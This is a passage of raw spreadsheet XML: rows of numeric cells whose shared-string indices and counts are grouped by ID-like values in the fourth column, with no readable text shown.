      <c r="A9890" t="s">
        <v>16228</v>
      </c>
      <c r="B9890" t="s">
        <v>16211</v>
      </c>
      <c r="C9890">
        <v>0</v>
      </c>
      <c r="D9890">
        <v>4862</v>
      </c>
    </row>
    <row r="9891" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9891" t="s">
        <v>16231</v>
      </c>
      <c r="B9891" t="s">
        <v>16212</v>
      </c>
      <c r="C9891">
        <v>0</v>
      </c>
      <c r="D9891">
        <v>4862</v>
      </c>
    </row>
    <row r="9892" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9892" t="s">
        <v>16228</v>
      </c>
      <c r="B9892" t="s">
        <v>16213</v>
      </c>
      <c r="C9892">
        <v>0</v>
      </c>
      <c r="D9892">
        <v>4862</v>
      </c>
    </row>
    <row r="9893" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9893" t="s">
        <v>16231</v>
      </c>
      <c r="B9893" t="s">
        <v>16214</v>
      </c>
      <c r="C9893">
        <v>0</v>
      </c>
      <c r="D9893">
        <v>4862</v>
      </c>
    </row>
    <row r="9894" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9894" t="s">
        <v>16228</v>
      </c>
      <c r="B9894" t="s">
        <v>16215</v>
      </c>
      <c r="C9894">
        <v>4</v>
      </c>
      <c r="D9894">
        <v>4862</v>
      </c>
    </row>
    <row r="9895" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9895" t="s">
        <v>16231</v>
      </c>
      <c r="B9895" t="s">
        <v>16216</v>
      </c>
      <c r="C9895">
        <v>1</v>
      </c>
      <c r="D9895">
        <v>4862</v>
      </c>
    </row>
    <row r="9896" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9896" t="s">
        <v>16228</v>
      </c>
      <c r="B9896" t="s">
        <v>16217</v>
      </c>
      <c r="C9896">
        <v>4</v>
      </c>
      <c r="D9896">
        <v>4862</v>
      </c>
    </row>
    <row r="9897" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9897" t="s">
        <v>16231</v>
      </c>
      <c r="B9897" t="s">
        <v>16218</v>
      </c>
      <c r="C9897">
        <v>1</v>
      </c>
      <c r="D9897">
        <v>4862</v>
      </c>
    </row>
    <row r="9898" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9898" t="s">
        <v>16229</v>
      </c>
      <c r="B9898" t="s">
        <v>16219</v>
      </c>
      <c r="C9898">
        <v>2</v>
      </c>
      <c r="D9898">
        <v>4862</v>
      </c>
    </row>
    <row r="9899" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9899" t="s">
        <v>16230</v>
      </c>
      <c r="B9899" t="s">
        <v>16220</v>
      </c>
      <c r="C9899">
        <v>1</v>
      </c>
      <c r="D9899">
        <v>4862</v>
      </c>
    </row>
    <row r="9900" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9900" t="s">
        <v>16229</v>
      </c>
      <c r="B9900" t="s">
        <v>16221</v>
      </c>
      <c r="C9900">
        <v>2</v>
      </c>
      <c r="D9900">
        <v>4862</v>
      </c>
    </row>
    <row r="9901" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9901" t="s">
        <v>16230</v>
      </c>
      <c r="B9901" t="s">
        <v>16222</v>
      </c>
      <c r="C9901">
        <v>1</v>
      </c>
      <c r="D9901">
        <v>4862</v>
      </c>
    </row>
    <row r="9902" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9902" t="s">
        <v>16223</v>
      </c>
      <c r="B9902" t="s">
        <v>16223</v>
      </c>
      <c r="C9902">
        <v>6</v>
      </c>
      <c r="D9902">
        <v>4862</v>
      </c>
    </row>
    <row r="9903" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9903" t="s">
        <v>16224</v>
      </c>
      <c r="B9903" t="s">
        <v>16224</v>
      </c>
      <c r="C9903">
        <v>0</v>
      </c>
      <c r="D9903">
        <v>4862</v>
      </c>
    </row>
    <row r="9904" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9904" t="s">
        <v>16228</v>
      </c>
      <c r="B9904" t="s">
        <v>16211</v>
      </c>
      <c r="C9904">
        <v>0</v>
      </c>
      <c r="D9904">
        <v>4846</v>
      </c>
    </row>
    <row r="9905" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9905" t="s">
        <v>16231</v>
      </c>
      <c r="B9905" t="s">
        <v>16212</v>
      </c>
      <c r="C9905">
        <v>0</v>
      </c>
      <c r="D9905">
        <v>4846</v>
      </c>
    </row>
    <row r="9906" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9906" t="s">
        <v>16228</v>
      </c>
      <c r="B9906" t="s">
        <v>16213</v>
      </c>
      <c r="C9906">
        <v>0</v>
      </c>
      <c r="D9906">
        <v>4846</v>
      </c>
    </row>
    <row r="9907" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9907" t="s">
        <v>16231</v>
      </c>
      <c r="B9907" t="s">
        <v>16214</v>
      </c>
      <c r="C9907">
        <v>0</v>
      </c>
      <c r="D9907">
        <v>4846</v>
      </c>
    </row>
    <row r="9908" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9908" t="s">
        <v>16228</v>
      </c>
      <c r="B9908" t="s">
        <v>16215</v>
      </c>
      <c r="C9908">
        <v>5</v>
      </c>
      <c r="D9908">
        <v>4846</v>
      </c>
    </row>
    <row r="9909" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9909" t="s">
        <v>16231</v>
      </c>
      <c r="B9909" t="s">
        <v>16216</v>
      </c>
      <c r="C9909">
        <v>3</v>
      </c>
      <c r="D9909">
        <v>4846</v>
      </c>
    </row>
    <row r="9910" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9910" t="s">
        <v>16228</v>
      </c>
      <c r="B9910" t="s">
        <v>16217</v>
      </c>
      <c r="C9910">
        <v>40</v>
      </c>
      <c r="D9910">
        <v>4846</v>
      </c>
    </row>
    <row r="9911" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9911" t="s">
        <v>16231</v>
      </c>
      <c r="B9911" t="s">
        <v>16218</v>
      </c>
      <c r="C9911">
        <v>0</v>
      </c>
      <c r="D9911">
        <v>4846</v>
      </c>
    </row>
    <row r="9912" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9912" t="s">
        <v>16229</v>
      </c>
      <c r="B9912" t="s">
        <v>16219</v>
      </c>
      <c r="C9912">
        <v>3</v>
      </c>
      <c r="D9912">
        <v>4846</v>
      </c>
    </row>
    <row r="9913" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9913" t="s">
        <v>16230</v>
      </c>
      <c r="B9913" t="s">
        <v>16220</v>
      </c>
      <c r="C9913">
        <v>13</v>
      </c>
      <c r="D9913">
        <v>4846</v>
      </c>
    </row>
    <row r="9914" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9914" t="s">
        <v>16229</v>
      </c>
      <c r="B9914" t="s">
        <v>16221</v>
      </c>
      <c r="C9914">
        <v>240</v>
      </c>
      <c r="D9914">
        <v>4846</v>
      </c>
    </row>
    <row r="9915" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9915" t="s">
        <v>16230</v>
      </c>
      <c r="B9915" t="s">
        <v>16222</v>
      </c>
      <c r="C9915">
        <v>3</v>
      </c>
      <c r="D9915">
        <v>4846</v>
      </c>
    </row>
    <row r="9916" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9916" t="s">
        <v>16223</v>
      </c>
      <c r="B9916" t="s">
        <v>16223</v>
      </c>
      <c r="C9916">
        <v>25</v>
      </c>
      <c r="D9916">
        <v>4846</v>
      </c>
    </row>
    <row r="9917" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9917" t="s">
        <v>16224</v>
      </c>
      <c r="B9917" t="s">
        <v>16224</v>
      </c>
      <c r="C9917">
        <v>3</v>
      </c>
      <c r="D9917">
        <v>4846</v>
      </c>
    </row>
    <row r="9918" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9918" t="s">
        <v>16228</v>
      </c>
      <c r="B9918" t="s">
        <v>16211</v>
      </c>
      <c r="C9918">
        <v>0</v>
      </c>
      <c r="D9918">
        <v>519</v>
      </c>
    </row>
    <row r="9919" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9919" t="s">
        <v>16231</v>
      </c>
      <c r="B9919" t="s">
        <v>16212</v>
      </c>
      <c r="C9919">
        <v>0</v>
      </c>
      <c r="D9919">
        <v>519</v>
      </c>
    </row>
    <row r="9920" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9920" t="s">
        <v>16228</v>
      </c>
      <c r="B9920" t="s">
        <v>16213</v>
      </c>
      <c r="C9920">
        <v>0</v>
      </c>
      <c r="D9920">
        <v>519</v>
      </c>
    </row>
    <row r="9921" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9921" t="s">
        <v>16231</v>
      </c>
      <c r="B9921" t="s">
        <v>16214</v>
      </c>
      <c r="C9921">
        <v>0</v>
      </c>
      <c r="D9921">
        <v>519</v>
      </c>
    </row>
    <row r="9922" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9922" t="s">
        <v>16228</v>
      </c>
      <c r="B9922" t="s">
        <v>16215</v>
      </c>
      <c r="C9922">
        <v>0</v>
      </c>
      <c r="D9922">
        <v>519</v>
      </c>
    </row>
    <row r="9923" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9923" t="s">
        <v>16231</v>
      </c>
      <c r="B9923" t="s">
        <v>16216</v>
      </c>
      <c r="C9923">
        <v>0</v>
      </c>
      <c r="D9923">
        <v>519</v>
      </c>
    </row>
    <row r="9924" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9924" t="s">
        <v>16228</v>
      </c>
      <c r="B9924" t="s">
        <v>16217</v>
      </c>
      <c r="C9924">
        <v>7</v>
      </c>
      <c r="D9924">
        <v>519</v>
      </c>
    </row>
    <row r="9925" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9925" t="s">
        <v>16231</v>
      </c>
      <c r="B9925" t="s">
        <v>16218</v>
      </c>
      <c r="C9925">
        <v>0</v>
      </c>
      <c r="D9925">
        <v>519</v>
      </c>
    </row>
    <row r="9926" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9926" t="s">
        <v>16229</v>
      </c>
      <c r="B9926" t="s">
        <v>16219</v>
      </c>
      <c r="C9926">
        <v>0</v>
      </c>
      <c r="D9926">
        <v>519</v>
      </c>
    </row>
    <row r="9927" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9927" t="s">
        <v>16230</v>
      </c>
      <c r="B9927" t="s">
        <v>16220</v>
      </c>
      <c r="C9927">
        <v>0</v>
      </c>
      <c r="D9927">
        <v>519</v>
      </c>
    </row>
    <row r="9928" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9928" t="s">
        <v>16229</v>
      </c>
      <c r="B9928" t="s">
        <v>16221</v>
      </c>
      <c r="C9928">
        <v>6</v>
      </c>
      <c r="D9928">
        <v>519</v>
      </c>
    </row>
    <row r="9929" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9929" t="s">
        <v>16230</v>
      </c>
      <c r="B9929" t="s">
        <v>16222</v>
      </c>
      <c r="C9929">
        <v>7</v>
      </c>
      <c r="D9929">
        <v>519</v>
      </c>
    </row>
    <row r="9930" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9930" t="s">
        <v>16223</v>
      </c>
      <c r="B9930" t="s">
        <v>16223</v>
      </c>
      <c r="C9930">
        <v>25</v>
      </c>
      <c r="D9930">
        <v>519</v>
      </c>
    </row>
    <row r="9931" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9931" t="s">
        <v>16224</v>
      </c>
      <c r="B9931" t="s">
        <v>16224</v>
      </c>
      <c r="C9931">
        <v>1</v>
      </c>
      <c r="D9931">
        <v>519</v>
      </c>
    </row>
    <row r="9932" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9932" t="s">
        <v>16228</v>
      </c>
      <c r="B9932" t="s">
        <v>16217</v>
      </c>
      <c r="C9932">
        <v>115</v>
      </c>
      <c r="D9932">
        <v>1149</v>
      </c>
    </row>
    <row r="9933" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9933" t="s">
        <v>16231</v>
      </c>
      <c r="B9933" t="s">
        <v>16218</v>
      </c>
      <c r="C9933">
        <v>34</v>
      </c>
      <c r="D9933">
        <v>1149</v>
      </c>
    </row>
    <row r="9934" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9934" t="s">
        <v>16228</v>
      </c>
      <c r="B9934" t="s">
        <v>16211</v>
      </c>
      <c r="C9934">
        <v>0</v>
      </c>
      <c r="D9934">
        <v>4820</v>
      </c>
    </row>
    <row r="9935" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9935" t="s">
        <v>16228</v>
      </c>
      <c r="B9935" t="s">
        <v>16211</v>
      </c>
      <c r="C9935">
        <v>0</v>
      </c>
      <c r="D9935">
        <v>4820</v>
      </c>
    </row>
    <row r="9936" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9936" t="s">
        <v>16231</v>
      </c>
      <c r="B9936" t="s">
        <v>16212</v>
      </c>
      <c r="C9936">
        <v>0</v>
      </c>
      <c r="D9936">
        <v>4820</v>
      </c>
    </row>
    <row r="9937" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9937" t="s">
        <v>16231</v>
      </c>
      <c r="B9937" t="s">
        <v>16212</v>
      </c>
      <c r="C9937">
        <v>0</v>
      </c>
      <c r="D9937">
        <v>4820</v>
      </c>
    </row>
    <row r="9938" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9938" t="s">
        <v>16228</v>
      </c>
      <c r="B9938" t="s">
        <v>16213</v>
      </c>
      <c r="C9938">
        <v>0</v>
      </c>
      <c r="D9938">
        <v>4820</v>
      </c>
    </row>
    <row r="9939" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9939" t="s">
        <v>16231</v>
      </c>
      <c r="B9939" t="s">
        <v>16214</v>
      </c>
      <c r="C9939">
        <v>0</v>
      </c>
      <c r="D9939">
        <v>4820</v>
      </c>
    </row>
    <row r="9940" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9940" t="s">
        <v>16228</v>
      </c>
      <c r="B9940" t="s">
        <v>16215</v>
      </c>
      <c r="C9940">
        <v>4</v>
      </c>
      <c r="D9940">
        <v>4820</v>
      </c>
    </row>
    <row r="9941" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9941" t="s">
        <v>16231</v>
      </c>
      <c r="B9941" t="s">
        <v>16216</v>
      </c>
      <c r="C9941">
        <v>2</v>
      </c>
      <c r="D9941">
        <v>4820</v>
      </c>
    </row>
    <row r="9942" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9942" t="s">
        <v>16228</v>
      </c>
      <c r="B9942" t="s">
        <v>16217</v>
      </c>
      <c r="C9942">
        <v>5</v>
      </c>
      <c r="D9942">
        <v>4820</v>
      </c>
    </row>
    <row r="9943" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9943" t="s">
        <v>16231</v>
      </c>
      <c r="B9943" t="s">
        <v>16218</v>
      </c>
      <c r="C9943">
        <v>0</v>
      </c>
      <c r="D9943">
        <v>4820</v>
      </c>
    </row>
    <row r="9944" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9944" t="s">
        <v>16229</v>
      </c>
      <c r="B9944" t="s">
        <v>16219</v>
      </c>
      <c r="C9944">
        <v>0</v>
      </c>
      <c r="D9944">
        <v>4820</v>
      </c>
    </row>
    <row r="9945" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9945" t="s">
        <v>16230</v>
      </c>
      <c r="B9945" t="s">
        <v>16220</v>
      </c>
      <c r="C9945">
        <v>0</v>
      </c>
      <c r="D9945">
        <v>4820</v>
      </c>
    </row>
    <row r="9946" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9946" t="s">
        <v>16229</v>
      </c>
      <c r="B9946" t="s">
        <v>16221</v>
      </c>
      <c r="C9946">
        <v>0</v>
      </c>
      <c r="D9946">
        <v>4820</v>
      </c>
    </row>
    <row r="9947" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9947" t="s">
        <v>16230</v>
      </c>
      <c r="B9947" t="s">
        <v>16222</v>
      </c>
      <c r="C9947">
        <v>0</v>
      </c>
      <c r="D9947">
        <v>4820</v>
      </c>
    </row>
    <row r="9948" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9948" t="s">
        <v>16223</v>
      </c>
      <c r="B9948" t="s">
        <v>16223</v>
      </c>
      <c r="C9948">
        <v>6</v>
      </c>
      <c r="D9948">
        <v>4820</v>
      </c>
    </row>
    <row r="9949" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9949" t="s">
        <v>16224</v>
      </c>
      <c r="B9949" t="s">
        <v>16224</v>
      </c>
      <c r="C9949">
        <v>0</v>
      </c>
      <c r="D9949">
        <v>4820</v>
      </c>
    </row>
    <row r="9950" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9950" t="s">
        <v>16228</v>
      </c>
      <c r="B9950" t="s">
        <v>16211</v>
      </c>
      <c r="C9950">
        <v>1</v>
      </c>
      <c r="D9950">
        <v>563</v>
      </c>
    </row>
    <row r="9951" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9951" t="s">
        <v>16231</v>
      </c>
      <c r="B9951" t="s">
        <v>16212</v>
      </c>
      <c r="C9951">
        <v>0</v>
      </c>
      <c r="D9951">
        <v>563</v>
      </c>
    </row>
    <row r="9952" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9952" t="s">
        <v>16228</v>
      </c>
      <c r="B9952" t="s">
        <v>16213</v>
      </c>
      <c r="C9952">
        <v>3</v>
      </c>
      <c r="D9952">
        <v>563</v>
      </c>
    </row>
    <row r="9953" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9953" t="s">
        <v>16231</v>
      </c>
      <c r="B9953" t="s">
        <v>16214</v>
      </c>
      <c r="C9953">
        <v>0</v>
      </c>
      <c r="D9953">
        <v>563</v>
      </c>
    </row>
    <row r="9954" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9954" t="s">
        <v>16228</v>
      </c>
      <c r="B9954" t="s">
        <v>16215</v>
      </c>
      <c r="C9954">
        <v>13</v>
      </c>
      <c r="D9954">
        <v>563</v>
      </c>
    </row>
    <row r="9955" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9955" t="s">
        <v>16231</v>
      </c>
      <c r="B9955" t="s">
        <v>16216</v>
      </c>
      <c r="C9955">
        <v>7</v>
      </c>
      <c r="D9955">
        <v>563</v>
      </c>
    </row>
    <row r="9956" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9956" t="s">
        <v>16228</v>
      </c>
      <c r="B9956" t="s">
        <v>16217</v>
      </c>
      <c r="C9956">
        <v>27</v>
      </c>
      <c r="D9956">
        <v>563</v>
      </c>
    </row>
    <row r="9957" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9957" t="s">
        <v>16231</v>
      </c>
      <c r="B9957" t="s">
        <v>16218</v>
      </c>
      <c r="C9957">
        <v>45</v>
      </c>
      <c r="D9957">
        <v>563</v>
      </c>
    </row>
    <row r="9958" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9958" t="s">
        <v>16229</v>
      </c>
      <c r="B9958" t="s">
        <v>16219</v>
      </c>
      <c r="C9958">
        <v>0</v>
      </c>
      <c r="D9958">
        <v>563</v>
      </c>
    </row>
    <row r="9959" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9959" t="s">
        <v>16230</v>
      </c>
      <c r="B9959" t="s">
        <v>16220</v>
      </c>
      <c r="C9959">
        <v>0</v>
      </c>
      <c r="D9959">
        <v>563</v>
      </c>
    </row>
    <row r="9960" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9960" t="s">
        <v>16229</v>
      </c>
      <c r="B9960" t="s">
        <v>16221</v>
      </c>
      <c r="C9960">
        <v>25</v>
      </c>
      <c r="D9960">
        <v>563</v>
      </c>
    </row>
    <row r="9961" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9961" t="s">
        <v>16230</v>
      </c>
      <c r="B9961" t="s">
        <v>16222</v>
      </c>
      <c r="C9961">
        <v>25</v>
      </c>
      <c r="D9961">
        <v>563</v>
      </c>
    </row>
    <row r="9962" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9962" t="s">
        <v>16223</v>
      </c>
      <c r="B9962" t="s">
        <v>16223</v>
      </c>
      <c r="C9962">
        <v>26</v>
      </c>
      <c r="D9962">
        <v>563</v>
      </c>
    </row>
    <row r="9963" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9963" t="s">
        <v>16224</v>
      </c>
      <c r="B9963" t="s">
        <v>16224</v>
      </c>
      <c r="C9963">
        <v>2</v>
      </c>
      <c r="D9963">
        <v>563</v>
      </c>
    </row>
    <row r="9964" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9964" t="s">
        <v>16228</v>
      </c>
      <c r="B9964" t="s">
        <v>16211</v>
      </c>
      <c r="C9964">
        <v>0</v>
      </c>
      <c r="D9964">
        <v>4903</v>
      </c>
    </row>
    <row r="9965" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9965" t="s">
        <v>16231</v>
      </c>
      <c r="B9965" t="s">
        <v>16212</v>
      </c>
      <c r="C9965">
        <v>0</v>
      </c>
      <c r="D9965">
        <v>4903</v>
      </c>
    </row>
    <row r="9966" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9966" t="s">
        <v>16228</v>
      </c>
      <c r="B9966" t="s">
        <v>16213</v>
      </c>
      <c r="C9966">
        <v>0</v>
      </c>
      <c r="D9966">
        <v>4903</v>
      </c>
    </row>
    <row r="9967" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9967" t="s">
        <v>16231</v>
      </c>
      <c r="B9967" t="s">
        <v>16214</v>
      </c>
      <c r="C9967">
        <v>0</v>
      </c>
      <c r="D9967">
        <v>4903</v>
      </c>
    </row>
    <row r="9968" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9968" t="s">
        <v>16228</v>
      </c>
      <c r="B9968" t="s">
        <v>16215</v>
      </c>
      <c r="C9968">
        <v>0</v>
      </c>
      <c r="D9968">
        <v>4903</v>
      </c>
    </row>
    <row r="9969" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9969" t="s">
        <v>16231</v>
      </c>
      <c r="B9969" t="s">
        <v>16216</v>
      </c>
      <c r="C9969">
        <v>1</v>
      </c>
      <c r="D9969">
        <v>4903</v>
      </c>
    </row>
    <row r="9970" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9970" t="s">
        <v>16228</v>
      </c>
      <c r="B9970" t="s">
        <v>16217</v>
      </c>
      <c r="C9970">
        <v>3</v>
      </c>
      <c r="D9970">
        <v>4903</v>
      </c>
    </row>
    <row r="9971" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9971" t="s">
        <v>16231</v>
      </c>
      <c r="B9971" t="s">
        <v>16218</v>
      </c>
      <c r="C9971">
        <v>0</v>
      </c>
      <c r="D9971">
        <v>4903</v>
      </c>
    </row>
    <row r="9972" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9972" t="s">
        <v>16229</v>
      </c>
      <c r="B9972" t="s">
        <v>16219</v>
      </c>
      <c r="C9972">
        <v>0</v>
      </c>
      <c r="D9972">
        <v>4903</v>
      </c>
    </row>
    <row r="9973" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9973" t="s">
        <v>16230</v>
      </c>
      <c r="B9973" t="s">
        <v>16220</v>
      </c>
      <c r="C9973">
        <v>0</v>
      </c>
      <c r="D9973">
        <v>4903</v>
      </c>
    </row>
    <row r="9974" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9974" t="s">
        <v>16229</v>
      </c>
      <c r="B9974" t="s">
        <v>16221</v>
      </c>
      <c r="C9974">
        <v>2</v>
      </c>
      <c r="D9974">
        <v>4903</v>
      </c>
    </row>
    <row r="9975" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9975" t="s">
        <v>16230</v>
      </c>
      <c r="B9975" t="s">
        <v>16222</v>
      </c>
      <c r="C9975">
        <v>0</v>
      </c>
      <c r="D9975">
        <v>4903</v>
      </c>
    </row>
    <row r="9976" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9976" t="s">
        <v>16223</v>
      </c>
      <c r="B9976" t="s">
        <v>16223</v>
      </c>
      <c r="C9976">
        <v>26</v>
      </c>
      <c r="D9976">
        <v>4903</v>
      </c>
    </row>
    <row r="9977" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9977" t="s">
        <v>16224</v>
      </c>
      <c r="B9977" t="s">
        <v>16224</v>
      </c>
      <c r="C9977">
        <v>0</v>
      </c>
      <c r="D9977">
        <v>4903</v>
      </c>
    </row>
    <row r="9978" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9978" t="s">
        <v>16228</v>
      </c>
      <c r="B9978" t="s">
        <v>16211</v>
      </c>
      <c r="C9978">
        <v>0</v>
      </c>
      <c r="D9978">
        <v>2850</v>
      </c>
    </row>
    <row r="9979" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9979" t="s">
        <v>16231</v>
      </c>
      <c r="B9979" t="s">
        <v>16212</v>
      </c>
      <c r="C9979">
        <v>0</v>
      </c>
      <c r="D9979">
        <v>2850</v>
      </c>
    </row>
    <row r="9980" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9980" t="s">
        <v>16228</v>
      </c>
      <c r="B9980" t="s">
        <v>16213</v>
      </c>
      <c r="C9980">
        <v>0</v>
      </c>
      <c r="D9980">
        <v>2850</v>
      </c>
    </row>
    <row r="9981" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9981" t="s">
        <v>16231</v>
      </c>
      <c r="B9981" t="s">
        <v>16214</v>
      </c>
      <c r="C9981">
        <v>0</v>
      </c>
      <c r="D9981">
        <v>2850</v>
      </c>
    </row>
    <row r="9982" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9982" t="s">
        <v>16228</v>
      </c>
      <c r="B9982" t="s">
        <v>16215</v>
      </c>
      <c r="C9982">
        <v>0</v>
      </c>
      <c r="D9982">
        <v>2850</v>
      </c>
    </row>
    <row r="9983" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9983" t="s">
        <v>16231</v>
      </c>
      <c r="B9983" t="s">
        <v>16216</v>
      </c>
      <c r="C9983">
        <v>2</v>
      </c>
      <c r="D9983">
        <v>2850</v>
      </c>
    </row>
    <row r="9984" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9984" t="s">
        <v>16228</v>
      </c>
      <c r="B9984" t="s">
        <v>16217</v>
      </c>
      <c r="C9984">
        <v>8</v>
      </c>
      <c r="D9984">
        <v>2850</v>
      </c>
    </row>
    <row r="9985" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9985" t="s">
        <v>16231</v>
      </c>
      <c r="B9985" t="s">
        <v>16218</v>
      </c>
      <c r="C9985">
        <v>0</v>
      </c>
      <c r="D9985">
        <v>2850</v>
      </c>
    </row>
    <row r="9986" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9986" t="s">
        <v>16229</v>
      </c>
      <c r="B9986" t="s">
        <v>16219</v>
      </c>
      <c r="C9986">
        <v>0</v>
      </c>
      <c r="D9986">
        <v>2850</v>
      </c>
    </row>
    <row r="9987" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9987" t="s">
        <v>16230</v>
      </c>
      <c r="B9987" t="s">
        <v>16220</v>
      </c>
      <c r="C9987">
        <v>0</v>
      </c>
      <c r="D9987">
        <v>2850</v>
      </c>
    </row>
    <row r="9988" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9988" t="s">
        <v>16229</v>
      </c>
      <c r="B9988" t="s">
        <v>16221</v>
      </c>
      <c r="C9988">
        <v>0</v>
      </c>
      <c r="D9988">
        <v>2850</v>
      </c>
    </row>
    <row r="9989" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9989" t="s">
        <v>16230</v>
      </c>
      <c r="B9989" t="s">
        <v>16222</v>
      </c>
      <c r="C9989">
        <v>0</v>
      </c>
      <c r="D9989">
        <v>2850</v>
      </c>
    </row>
    <row r="9990" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9990" t="s">
        <v>16223</v>
      </c>
      <c r="B9990" t="s">
        <v>16223</v>
      </c>
      <c r="C9990">
        <v>31</v>
      </c>
      <c r="D9990">
        <v>2850</v>
      </c>
    </row>
    <row r="9991" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9991" t="s">
        <v>16224</v>
      </c>
      <c r="B9991" t="s">
        <v>16224</v>
      </c>
      <c r="C9991">
        <v>0</v>
      </c>
      <c r="D9991">
        <v>2850</v>
      </c>
    </row>
    <row r="9992" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9992" t="s">
        <v>16228</v>
      </c>
      <c r="B9992" t="s">
        <v>16211</v>
      </c>
      <c r="C9992">
        <v>0</v>
      </c>
      <c r="D9992">
        <v>4786</v>
      </c>
    </row>
    <row r="9993" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9993" t="s">
        <v>16231</v>
      </c>
      <c r="B9993" t="s">
        <v>16212</v>
      </c>
      <c r="C9993">
        <v>0</v>
      </c>
      <c r="D9993">
        <v>4786</v>
      </c>
    </row>
    <row r="9994" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A9994" t="s">
        <v>16228</v>
      </c>
      <c r="B9994" t="s">
        <v>16213</v>
      </c>
      <c r="C9994">
        <v>0</v>
      </c>
      <c r="D9994">
        <v>4786</v>
      </c>
    </row>
    <row r="9995" spans="1:4" x14ac:dyDescent="0.2">
